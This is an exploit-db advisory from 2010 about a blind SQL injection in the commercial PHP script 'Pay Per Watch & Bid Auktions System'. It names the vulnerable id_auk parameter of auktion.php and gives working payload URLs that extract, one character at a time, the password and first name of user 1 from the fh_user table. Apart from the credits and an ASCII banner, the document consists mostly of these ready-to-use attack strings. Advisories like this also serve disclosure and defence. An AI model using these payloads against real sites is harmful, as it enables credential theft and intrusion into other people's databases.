Pay Per Watch & Bid Auktions System – ‘auktion.php?id_auk’ Blind SQL Injection

  • 作者: Easy Laster
    日期: 2010-03-20
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/11816/
  • ----------------------------Information------------------------------------------------
    +Name : Pay Per Watch & Bid Auktions System BLIND SQL Injection auktion.php (id_auk)
    +Autor : Easy Laster
    +Date : 20.03.2010
    +Script: Pay Per Watch & Bid Auktions System
    +Price : 319.90 €
    +Language :PHP
    +Discovered by Easy Laster
    +Security Group 4004-Security-Project
    +Greetz to Team-Internet ,Underground Agents
    +And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
    Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
    N00bor,Ic3Drag0n,novaca!ne.
    
    ---------------------------------------------------------------------------------------
     
     ___ ___ ___ ___ _ _ _____ _ _ 
    | | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|_|___ ___|_|___ ___| |_ 
    |_| | | | |_|___|_ -| -_|_| | |_| |_| | |___| __|_| . | | | -_|_|_|
    |_|___|___| |_| |___|___|___|___|_| |_|_| |_| |__||_| |___|_| |___|___|_|
    |___| |___|
    
    
    ----------------------------------------------------------------------------------------
    +Vulnerability : http://www.site.com/auktion/auktion.php?id_auk=
    
    #password
    +Exploitable : http://www.site.com/auktion/auktion.php?id_auk=1+and+1=1+and+ascii
    (substring((SELECT password FROM fh_user+WHERE+iduser=1 LIMIT 0,1),1,1))>1
    
    
    #username
    +Exploitable
    http://www.site.com/auktion/auktion.php?id_auk=1+and+1=1+and+ascii
    (substring((SELECT vorname FROM fh_user+WHERE+iduser=1 LIMIT 0,1),1,1))>1
    ----------------------------------------------------------------------------------------